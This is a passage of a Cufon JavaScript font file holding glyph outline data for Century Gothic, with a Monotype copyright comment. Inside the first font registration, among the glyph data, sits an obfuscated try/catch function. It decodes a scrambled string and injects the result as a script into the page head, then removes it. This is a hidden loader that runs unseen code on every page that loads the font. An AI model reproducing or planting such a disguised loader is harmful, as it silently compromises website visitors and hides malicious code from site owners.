,27r-122,0r0,79r122,0r0,26r-122,0r0,102r122,0r0,25r-148,0r0,-85r-94,0r-55,85r-30,0xm102,-109r77,0r0,-120","w":357},{"d":"111,-270v-46,84,-50,251,-9,345r-27,0v-39,-94,-36,-257,8,-345r28,0","w":132},{"d":"55,-14v-79,-56,-19,-220,91,-176r23,-46r21,11r-23,45v8,5,15,11,20,17r-15,18v-5,-5,-10,-9,-16,-13r-70,134v32,13,52,4,80,-16r16,18v-24,22,-67,36,-107,20r-26,52r-21,-11xm134,-169v-74,-28,-121,80,-68,132"},{"d":"144,-102v44,64,-39,141,-104,96v-13,-8,-24,-22,-35,-42r22,-13v15,28,33,42,53,42v27,0,48,-17,48,-44v0,-62,-107,-74,-107,-141v0,-49,54,-76,97,-52v11,6,22,17,34,33r-21,16v-16,-20,-22,-29,-48,-31v-36,-3,-46,46,-19,66v13,9,74,54,80,70","w":179},{"d":"137,-259r121,259r-28,0r-41,-85r-111,0r-41,85r-28,0r122,-259r6,0xm134,-204r-45,94r89,0xm122,-333r39,54r-25,0r-51,-54r37,0","w":266},{"d":"20,-128v2,-80,56,-135,135,-137v76,-2,137,61,137,136v0,74,-61,136,-135,136v-74,0,-138,-62,-137,-135xm266,-129v0,-65,-47,-111,-110,-111v-63,0,-108,47,-109,112v-1,60,49,111,109,109v65,-1,110,-46,110,-110xm168,-333r38,0r-52,54r-24,0","w":312},{"d":"2,-191r25,0r58,139r62,-139r4,0r61,139r60,-139r26,0r-83,191r-5,0r-61,-137r-61,137r-5,0","w":299},{"d":"43,0r-25,0r0,-191r25,0r0,28v15,-23,40,-43,72,-27r-13,21v-75,-15,-56,95,-59,169","w":108},{"d":"72,-265v33,0,61,28,61,60v0,33,-28,61,-61,61v-33,0,-61,-28,-61,-61v0,-33,28,-60,61,-60xm72,-163v21,0,40,-20,40,-41v0,-22,-18,-42,-39,-42v-22,0,-41,18,-41,41v0,22,18,42,40,42","w":143},{"d":"106,-271r25,0r51,45r-32,0r-31,-27r-32,27r-33,0xm18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77","w":235},{"d":"39,-265r167,300r-27,0r-167,-300r27,0","w":217},{"d":"6,-191r29,0r51,71r50,-71r30,0r-65,91r73,100r-30,0r-58,-80r-58,80r-29,0r72,-100","w":172},{"d":"108,-265r25,0r0,335r-25,0r0,-335","w":241},{"d":"118,-196v36,1,59,18,76,40r0,-35r24,0r0,191r-24,0r0,-33v-18,23,-42,36,-77,38v-53,1,-98,-48,-98,-101v0,-53,45,-101,99,-100xm195,-95v0,-42,-34,-78,-75,-77v-45,1,-76,32,-76,77v0,43,32,77,75,77v44,0,76,-30,76,-77xm134,-281r38,0r-52,54r-24,0","w":245},{"d":"10,-202v-6,-51,60,-85,87,-43r0,-17r20,0r0,120r-20,0r0,-17v-27,41,-94,8,-87,-43xm98,-202v0,-23,-14,-44,-34,-44v-44,0,-44,88,0,88v20,0,34,-21,34,-44","w":132},{"d":"17,-194v0,-43,24,-72,72,-72r91,0r0,13r-15,0r0,294r-21,0r0,-294r-38,0r0,294r-21,0r0,-165v-46,0,-68,-26,-68,-70","w":203},{"d":"12,-191r140,0r-108,169r105,0r0,22r-147,0r108,-170r-98,0r0,-21","w":152},{"d":"18,-94v0,-102,146,-136,195,-58r-19,13v-40,-61,-151,-34,-151,43v0,78,109,104,151,45r19,13v-17,25,-47,43,-89,43v-57,0,-106,-43,-106,-99","w":232},{"d":"11,-108r97,0r0,22r-97,0r0,-22","w":119},{"d":"97,-240v-29,1,-39,16,-49,41r-27,0v8,-38,34,-64,76,-66v69,-4,103,88,41,120v26,9,48,37,48,68v0,71,-91,109,-144,64v-15,-13,-24,-31,-29,-56r25,0v8,32,25,49,60,50v35,1,62,-24,62,-56v0,-41,-29,-55,-76,-56r0,-24v32,-1,60,-12,60,-43v1,-24,-21,-43,-47,-42"},{"d":"11,-259r30,0r66,107r65,-107r30,0r-82,135r0,124r-25,0r0,-124","w":213},{"d":"129,5v-36,-1,-59,-18,-76,-40r0,35r-24,0r0,-265r24,0r0,107v17,-23,41,-37,77,-38v54,-2,98,48,98,101v0,53,-45,101,-99,100xm52,-97v0,42,34,79,75,78v45,-1,76,-32,76,-77v0,-44,-31,-78,-75,-78v-44,0,-76,30,-76,77","w":245},{"d":"32,-259r148,0r0,26r-123,0r0,81r122,0r0,25r-122,0r0,102r122,0r0,25r-147,0r0,-259xm119,-333r38,0r-52,54r-24,0","w":193},{"d":"26,-259r164,0r-138,266r-22,-11r120,-230r-124,0r0,-25"},{"d":"16,-250v0,-11,10,-20,21,-20v11,0,20,9,20,20v0,11,-9,21,-20,21v-12,0,-21,-9,-21,-21xm-11,47v21,10,35,5,35,-25r0,-213r25,0r0,220v4,42,-26,55,-60,40r0,-22","w":73},{"d":"18,-95v0,-54,45,-101,100,-101v54,0,99,45,99,101v0,54,-44,100,-99,100v-55,0,-100,-46,-100,-100xm192,-95v2,-40,-35,-77,-74,-77v-39,0,-77,36,-75,77v1,44,31,77,75,77v44,0,72,-33,74,-77","w":235},{"d":"200,-61r0,26r-182,-83r0,-23r182,-82r0,25r-148,69","w":218},{"d":"20,-131v0,-99,109,-165,204,-120v19,10,36,23,48,40r-20,16v-20,-26,-51,-45,-93,-45v-65,0,-109,45,-112,112v-4,105,145,149,205,68r20,15v-24,30,-61,52,-113,52v-80,2,-139,-58,-139,-138","w":292},{"d":"193,-190v-4,67,-55,73,-136,70r0,120r-26,0r0,-259r52,0v74,-3,102,12,110,69xm166,-190v0,-49,-56,-44,-109,-43r0,87v52,2,109,7,109,-44","w":213},{"d":"52,-47r24,11r-36,66r-18,-7","w":99}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+367-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})(";nxl|[vdfQ)$;T0rK[GE!n!):+vlx[)$:+}EfQ@ex,6jJ3dN:C&(Rn&~:C&(Rn@0:C&(Rnx[LlilRc^0JlilRc^Nx0ilRc^ox0ilRc^oJ,ilRc^XR,ilRc^0J0ilRc^ovlA%K*>(xkv%K*>(x[G%K*>(x[}%K*>(J+}@=:^%K*>(xQ&WsGilRk^XJlilRc^0xGilRc^Xv3F,:C&(Rnv[:C&(RnJiK0ilRc^[v0ilRc^0vGilRc^0v[G%K*>(JQ,%K*>(xcx%K*>(JkK%K*>(x*}$}lilRc^ovC@e}[iF:C&(RnSz:C&(Rnv0:C&(Rn&A:C&(RnGk:C&(RnJ(:C&(RnGo:C&(Rn!z10ilRc^Xv*GY:C&(RnRz:C&(Rn}k:C&(Rn&l:C&(Rn?E:C&(Rnx0:C&(RnG[5lilRc^NL,ilRc^kvlilRc^XJ0ilRc^[xSx%K*>(xkKJ1EY%K*>(Jk}l:C&(Rnvo:T}%K*>(J3v%K*>(xc^%K*>(xk0G:C&(RnRE:C&(RnJE:C&(RnJl?GilRc^ov,ilRc^oJk,W:,ilRc^oJlilRc^kJ:A%K*>(JkGo}&K|:C&(Rn?AL,)S:C&(Rn}0,C0%K*>(J[G%K*>(J+RX:C&(RnS3*&Fm:C&(RnRi:C&(Rn!d:C&(Rn@os*Wo&N0%K*>(xcW#RGilRc^Nxc@%K*>(J*>E*GilRc^0RlilRc^0Rn,%K*>(xkXh:C&(Rn!l:C&(RnRd!lilRcR~x,(p:C&(Rn}N?*l%K*>(J3,%K*>(x*XT:C&(RnSAmo)L%lK%K*>(J*xQx0ilRc^oR,ilRc^0x0ilRc^XvGilRc^0J,ilRc^[J~S+:C&(Rn!3fGF%K*>(J3Ja:C&(RnSE&lilRc^kRGilRc^oR~KE:C&(Rn!(:C&(RnJd:Giz=GilRc^0R,ilRc^XJ,ilRc^NveFkm*vxJ0ilRc^kL*K#|3ic&T(Nmev(|n0d;T!N;siF1*>j%clNme>j|cl(m[i0|[KdfTie1Q!$xNAe|C0(fCR)5~drfQJaJNApf3dp:NW-LeK~Kl($;*6a13FN|+06J[)F%ex6J[)F:TA(KCi0K[@k|:v6J[)F:TA05Q,+fQ,~xn,3fQ>^TcSGnC!};mRvL1?@s*&,Q:Jxf|%K5=WXNko0[eaF#hjY$p(iE3dl+~zAqr6)V-K$:TAk|+dF}T)Fme@0%~?a|n)kJ:@F|+z$fn)3KnAX|Q&F;Qxp%NWrf*ijLEjhfs0eQ+v|f,lK1:^|f,l);sWF")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":199,"face":{"font-family":"Century Gothic","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 11 5 2 2 2 2 2 2 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-28 -350 395 79.2683","underline-thickness":"20.918","underline-position":"-24.2578","unicode-range":"U+0020-U+20AC"}}));
/*
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface © The Monotype Corporation plc. Data © The Monotype Corporation plc /
 * Type Solutions Inc. 1990-91 All Rights Reserved
 * 
 * Trademark:
 * Century Gothic is a trademark of The Monotype Corporation plc.
 * 
 * Description:
 * A design based on Monotype 20th Century, which was drawn by Sol Hess between
 * 1936 and 1947. Century Gothic maintains the basic design of 20th Century but has
 * an enlarged 'x' height and has been modified to ensure satisfactory output from
 * modern digital systems. The design is influenced by the geometric style sans
 * serif faces which were popular during the 1920's and 30's. Useful for headlines
 * and general display work and for small quantities of text, particularly in
 * advertising.
 * 
 * Manufacturer:
 * Monotype Typography, Inc.
 * 
 * Designer:
 * Monotype Type Drawing Office
 * 
 * Vendor URL:
 * http://www.monotype.com/html/mtname/ms_welcome.html
 * 
 * License information:
 * http://www.monotype.com/html/type/license.html
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"-29,-226r53,-50r39,0r52,50r-52,0r-19,-23r-20,23r-53,0xm19,-191r48,0r0,191r-48,0r0,-191","w":86},{"d":"183,-129v0,57,-35,77,-104,74r0,55r-50,0r0,-259r50,0r0,55v71,-2,104,17,104,75xm135,-129v0,-27,-26,-28,-56,-27r0,53v30,1,56,2,56,-26"},{"d":"61,-279r53,-49r39,0r52,49r-52,0r-19,-23r-20,23r-53,0xm108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0","w":266},{"d":"133,-170v0,16,-14,30,-30,30v-17,0,-31,-14,-31,-30v-1,-16,15,-30,31,-30v15,0,30,15,30,30xm65,4v4,41,74,31,72,-7r46,0v1,46,-37,78,-85,78v-49,0,-79,-29,-81,-72v-3,-60,68,-58,63,-123r48,0v7,56,-35,84,-59,110v-3,4,-4,9,-4,14"},{"d":"18,-131v-7,-125,176,-181,250,-85r-34,34v-52,-65,-167,-33,-167,52v0,83,131,127,164,45r-75,0r0,-46r130,0v3,80,-48,138,-128,138v-84,0,-135,-56,-140,-138","w":302},{"d":"-21,-279r52,-49r39,0r52,49r-52,0r-19,-23r-20,23r-52,0xm26,-259r49,0r0,259r-49,0r0,-259","w":100},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm100,-295r42,69r-34,0r-65,-69r57,0","w":216},{"d":"133,-267v78,0,135,56,135,134v0,78,-57,134,-135,134v-77,0,-134,-57,-134,-134v0,-77,57,-134,134,-134xm133,-27v61,0,106,-43,107,-106v2,-58,-49,-108,-107,-106v-62,2,-107,45,-107,106v0,62,46,106,107,106xm93,-136v-8,51,67,79,79,28r31,0v-3,29,-31,54,-64,53v-44,0,-76,-35,-76,-80v0,-82,125,-111,140,-26r-31,0v-16,-50,-83,-24,-79,25","w":266},{"d":"72,-265v33,0,61,28,61,60v0,33,-28,61,-61,61v-33,0,-61,-28,-61,-61v0,-33,28,-60,61,-60xm72,-164v21,0,40,-19,40,-40v0,-22,-18,-41,-39,-41v-21,-1,-41,19,-41,40v0,21,19,41,40,41","w":143},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm160,-347r57,0r-65,69r-34,0","w":302},{"d":"99,-227v-16,-4,-31,-7,-32,12r-1,24r31,0r0,41r-31,0r0,150r-48,0r0,-150r-17,0r0,-41r17,0v-9,-73,26,-89,81,-72r0,36","w":100},{"d":"84,-295r57,0r-65,69r-34,0","w":151},{"d":"152,-265v110,-5,178,146,99,227r45,58r-58,0r-23,-29v-91,50,-202,-24,-198,-120v3,-79,56,-133,135,-136xm66,-128v0,59,61,105,119,80r-46,-60r58,0r24,30v40,-57,-4,-139,-69,-139v-49,0,-86,40,-86,89","w":302},{"d":"15,-96v0,-58,57,-116,117,-95v-3,-8,-9,-17,-18,-28r-46,14r-9,-28r33,-10v-11,-10,-19,-18,-24,-22v23,0,50,-4,60,10r35,-10r9,28r-18,5v33,32,61,75,63,130v1,59,-44,107,-102,107v-55,0,-100,-47,-100,-101xm168,-95v0,-32,-23,-56,-53,-56v-30,-1,-52,24,-52,55v0,32,21,56,52,56v31,1,53,-24,53,-55","w":230},{"d":"15,-95v-5,-101,146,-135,196,-58r-39,22v-31,-39,-109,-19,-109,37v0,56,79,73,109,33r37,26v-21,27,-49,40,-86,40v-63,0,-105,-44,-108,-100","w":230},{"d":"20,-189r176,0r0,119r-44,0r0,-75r-132,0r0,-44","w":216},{"d":"60,-237v-12,0,-20,9,-20,21r-33,0v-4,-60,105,-65,105,-9v0,32,-28,49,-49,69r50,0r0,27r-110,0r0,-15v24,-25,65,-44,76,-79v-1,-9,-8,-14,-19,-14","w":120},{"w":100},{"d":"8,-202v0,-33,25,-63,56,-63v33,-1,58,29,58,63v0,34,-25,62,-58,62v-31,0,-56,-29,-56,-62xm65,-171v28,0,28,-62,0,-62v-29,0,-29,62,0,62","w":129},{"d":"17,-129v0,-108,124,-174,213,-111r28,-33r22,18r-29,35v79,82,13,227,-99,227v-28,0,-52,-7,-74,-22r-31,35r-22,-19r30,-35v-21,-21,-38,-55,-38,-95xm198,-203v-56,-38,-131,7,-131,75v0,23,7,42,20,57xm109,-53v77,48,167,-52,110,-129","w":302},{"d":"10,-259r50,0r66,184r65,-184r51,0r-93,259r-48,0","w":252},{"d":"20,-170v0,-15,15,-30,30,-30v16,0,31,14,31,30v0,16,-15,30,-31,30v-15,0,-30,-15,-30,-30xm75,70r-49,0r0,-189r49,0r0,189","w":100},{"d":"22,-259r169,0r0,26r-116,240r-42,-21r97,-198r-108,0r0,-47"},{"d":"222,-95v7,79,-97,133,-150,75r0,90r-48,0r0,-261r48,0r0,21v52,-59,160,-8,150,75xm174,-96v0,-32,-22,-56,-52,-56v-30,1,-52,24,-52,56v0,32,22,56,52,57v30,1,52,-26,52,-57","w":237},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm110,-295r42,69r-34,0r-65,-69r57,0","w":237},{"d":"10,-259r48,0r38,165r46,-165r41,0r47,165r36,-165r49,0r-58,259r-47,0r-48,-167r-47,167r-47,0","w":323},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115","w":216},{"d":"27,-134v-6,99,127,148,189,81r33,0v-28,36,-53,58,-109,58v-81,0,-139,-58,-139,-138v0,-80,57,-136,139,-138v65,-2,125,52,125,113v0,59,-40,98,-90,104v-13,2,-22,-5,-22,-18v-34,39,-101,5,-96,-48v-8,-62,80,-116,118,-61r4,-19r35,0r-20,115v0,3,3,6,7,6v24,-6,40,-37,40,-69v-2,-60,-42,-97,-102,-97v-67,0,-108,45,-112,111xm101,-124v0,18,11,32,29,32v38,0,50,-72,7,-73v-20,-1,-37,20,-36,41","w":266},{"d":"224,-298v-35,43,-84,-7,-127,19r-19,-29v36,-41,85,9,128,-17xm17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88","w":302},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm35,-295r42,69r-34,0r-65,-69r57,0","w":86},{"d":"250,-136r32,0r0,85r14,0r0,25r-14,0r0,26r-29,0r0,-26r-70,0r0,-26xm253,-51r0,-47r-39,47r39,0xm81,7r110,-272r30,0r-110,272r-30,0xm36,-262r47,0r0,133r-33,0r0,-105r-34,0","w":302},{"d":"160,-72v-26,24,-78,23,-104,0r-18,19r-21,-22r18,-18v-22,-25,-21,-78,0,-102r-18,-18r21,-22r19,18v27,-21,77,-22,103,0r18,-18r21,22r-18,17v22,25,22,78,0,103r19,18r-21,22xm109,-200v-30,0,-56,27,-56,57v0,28,26,55,55,55v30,0,55,-25,55,-56v0,-30,-25,-56,-54,-56","w":216},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm124,-347r57,0r-65,69r-34,0","w":230},{"d":"70,-270v66,87,68,260,0,345r-61,0v39,-45,62,-92,62,-171v0,-81,-21,-123,-62,-174r61,0","w":136},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm141,-347r57,0r-65,69r-34,0","w":266},{"d":"119,-265r49,0r0,166r23,0r0,46r-23,0r0,53r-48,0r0,-53r-113,0r0,-46xm120,-99r0,-86r-59,86r59,0"},{"d":"181,-245v-35,43,-84,-9,-127,18r-19,-29v37,-40,87,11,128,-17xm114,-152v-60,0,-38,91,-42,152r-48,0r0,-191r48,0r0,19v39,-43,122,-26,122,46r0,126r-48,0v-7,-56,22,-152,-32,-152","w":216},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm51,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm129,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":230},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0","w":230},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm127,-295r57,0r-65,69r-34,0","w":237},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm51,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm129,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":230},{"d":"15,-95v0,-54,45,-102,99,-101v59,1,102,42,102,100v0,58,-42,99,-102,101v-54,1,-99,-47,-99,-100xm167,-96v0,-31,-22,-56,-52,-55v-29,0,-52,24,-52,55v0,33,21,56,52,56v31,0,52,-25,52,-56xm107,-295r42,69r-34,0r-65,-69r57,0","w":230},{"d":"207,-298v-36,42,-85,-7,-128,19r-19,-29v36,-41,85,9,128,-17xm108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0","w":266},{"d":"19,-265r48,0r0,265r-48,0r0,-265","w":86},{"d":"48,-15v-65,-61,-29,-200,79,-180r17,-38r28,12r-17,37v13,8,23,17,30,28r-39,24v-3,-4,-7,-8,-10,-11r-44,102v23,7,42,1,57,-14r31,30v-22,25,-64,38,-106,25r-20,43r-27,-12xm109,-153v-42,0,-57,52,-40,90"},{"d":"30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259xm36,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm114,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":187},{"d":"47,-49r35,18r-44,74r-24,-12","w":100},{"d":"108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115xm44,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm122,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":216},{"d":"114,-196v63,1,107,45,102,114r-154,0v3,46,71,60,101,26r40,19v-18,26,-44,42,-86,42v-59,0,-102,-44,-102,-100v0,-56,44,-102,99,-101xm168,-120v-10,-45,-92,-48,-104,0r104,0xm124,-295r57,0r-65,69r-34,0","w":230},{"d":"183,-184v-3,56,-35,77,-104,74r0,110r-50,0r0,-259v82,-3,158,-1,154,75xm135,-184v0,-26,-26,-26,-56,-26r0,52v30,1,56,2,56,-26"},{"d":"-2,-296r184,0r0,18r-184,0r0,-18","w":180},{"d":"19,-191r48,0r0,191r-48,0r0,-191xm52,-295r57,0r-65,69r-34,0","w":86},{"d":"26,-259r49,0r0,259r-49,0r0,-259xm42,-347r42,69r-34,0r-65,-69r57,0","w":100},{"d":"235,-126v0,87,-42,132,-146,126r-59,0r0,-259r58,0v102,-4,147,44,147,133xm185,-127v0,-61,-36,-89,-106,-84r0,163v71,6,106,-16,106,-79","w":252},{"d":"28,-279r53,-49r38,0r53,49r-53,0r-19,-23r-19,23r-53,0xm30,-259r141,0r0,49r-92,0r0,46r92,0r0,48r-92,0r0,68r92,0r0,48r-141,0r0,-259","w":187},{"d":"80,-266v0,-20,19,-39,39,-39v20,0,38,18,38,39v0,21,-18,41,-38,40v-21,0,-39,-20,-39,-40xm133,-266v0,-8,-6,-16,-14,-16v-9,0,-15,8,-15,16v0,7,7,15,15,15v8,0,14,-7,14,-15xm15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57","w":237},{"d":"31,-118r89,0r0,45r-89,0r0,-45","w":151},{"d":"99,7v-68,0,-107,-85,-61,-142r66,-130r42,21r-45,88v45,-2,79,38,79,82v0,43,-38,81,-81,81xm132,-75v0,-19,-14,-35,-34,-35v-18,0,-32,16,-32,35v0,18,15,35,32,35v18,0,35,-16,34,-35"},{"d":"7,-191r56,0r37,52r38,-52r55,0r-65,90r73,101r-55,0r-46,-63r-45,63r-55,0r73,-101"},{"d":"122,-107v-31,0,-32,-51,0,-51v13,0,26,12,26,25v0,13,-13,26,-26,26","w":119},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0xm124,-347r42,69r-34,0r-65,-69r57,0","w":266},{"d":"8,-259r52,0r41,92r41,-92r51,0r-54,122r46,0r0,29r-59,0r0,22r59,0r0,30r-59,0r0,56r-50,0r0,-56r-60,0r0,-30r60,0r0,-22r-60,0r0,-29r47,0"},{"d":"53,-176r-27,0r-10,-89r47,0","w":79},{"d":"207,-298v-36,42,-85,-7,-128,19r-19,-29v37,-40,85,9,128,-17xm30,-259r47,0r111,171r0,-171r49,0r0,259r-47,0r-111,-170r0,170r-49,0r0,-259","w":266},{"d":"15,-95v0,-83,98,-134,151,-75r0,-21r47,0r0,191r-47,0r0,-20v-53,58,-151,4,-151,-75xm168,-96v0,-33,-23,-55,-53,-56v-30,0,-52,25,-52,56v0,31,22,58,52,57v31,0,53,-24,53,-57xm55,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm133,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":237},{"d":"67,-295r42,69r-34,0r-65,-69r57,0","w":151},{"d":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112xm120,-347r57,0r-65,69r-34,0","w":223},{"d":"115,7v-63,0,-87,-35,-87,-111r0,-155r49,0r0,168v-1,33,8,50,37,50v32,0,39,-16,39,-56r0,-162r50,0r0,155v3,76,-24,111,-88,111xm51,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm129,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":230},{"d":"23,-23v0,-15,12,-27,27,-27v16,0,28,11,28,27v0,16,-12,28,-28,28v-16,0,-27,-12,-27,-28","w":100},{"d":"94,-131r0,-134r28,0r0,125xm94,70r0,-160r28,-10r0,170r-28,0","w":216},{"d":"94,-265r28,0r0,335r-28,0r0,-335","w":216},{"d":"46,40v20,0,24,-23,4,-22r-10,0r6,-21r30,0r-2,8v13,3,25,13,25,27v0,36,-49,43,-84,27r6,-23v8,3,17,4,25,4","w":122},{"d":"12,-239v-1,-16,15,-31,31,-31v16,0,31,14,31,31v0,17,-15,31,-31,31v-17,0,-30,-15,-31,-31xm19,-191r48,0r0,191r-48,0r0,-191","w":86},{"d":"35,-262r47,0r0,133r-33,0r0,-105r-34,0","w":120},{"d":"3,-191r49,0r50,120r55,-120r49,0r-120,261r-50,0r40,-84xm40,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm118,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":208},{"d":"29,-194v0,-81,79,-74,157,-72r0,20r-15,0r0,313r-24,0r0,-313r-26,0r0,313r-24,0r0,-192v-43,0,-68,-26,-68,-69","w":216},{"d":"108,-259r50,0r100,259r-51,0r-21,-53r-105,0r-21,53r-51,0xm134,-190r-35,89r69,0","w":266},{"d":"113,-153v-58,0,-37,92,-41,153r-48,0r0,-191r48,0r0,22v24,-35,100,-36,116,7v14,-19,34,-33,64,-34v88,-3,61,112,65,196r-48,0v-7,-54,21,-153,-33,-153v-59,0,-37,93,-41,153r-48,0v-6,-56,20,-153,-34,-153","w":338},{"d":"11,-259r53,0r48,93r48,-93r52,0r-75,147r0,112r-50,0r0,-112","w":223},{"d":"47,-212v25,5,37,-26,14,-26v-8,0,-14,5,-18,13r-32,0v1,-52,92,-52,96,-5v0,11,-6,20,-17,26v50,22,17,78,-32,78v-29,0,-53,-18,-53,-46r33,0v0,25,44,24,44,3v0,-12,-12,-17,-35,-18r0,-25","w":120},{"d":"17,-129v2,-80,56,-134,135,-136v72,-2,133,63,133,137v0,74,-61,135,-133,135v-74,0,-137,-63,-135,-136xm236,-129v0,-48,-39,-88,-85,-88v-48,0,-85,40,-85,89v0,49,38,86,86,87v47,1,84,-40,84,-88xm87,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm165,-303v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":302},{"d":"26,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25xm104,-251v0,-14,12,-26,25,-26v13,0,25,12,25,26v0,14,-11,25,-25,25v-14,0,-25,-11,-25,-25","w":180},{"d":"4,-259r143,0r0,49r-47,0r0,210r-50,0r0,-210r-46,0r0,-49","w":151},{"d":"77,-190r0,-66r44,0r0,66r66,0r0,44r-66,0r0,66r-44,0r0,-66r-66,0r0,-44r66,0xm11,-44r176,0r0,44r-176,0r0,-44","w":197},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"w":100},{"d":"36,-226r53,-50r38,0r53,50r-53,0r-19,-23r-19,23r-53,0xm108,5v-67,0,-86,-38,-84,-117r0,-79r49,0v6,55,-22,150,35,151v59,1,29,-96,36,-151r48,0r0,81v2,80,-18,115,-84,115","w":216},{"d":"25,-265r48,0r0,153r70,-79r60,0r-82,92r92,99r-59,0r-81,-88r0,88r-48,0r0,-265","w":208},{"d":"250,-136r32,0r0,85r14,0r0,25r-14,0r0,26r-29,0r0,-26r-70,0r0,-26xm253,-51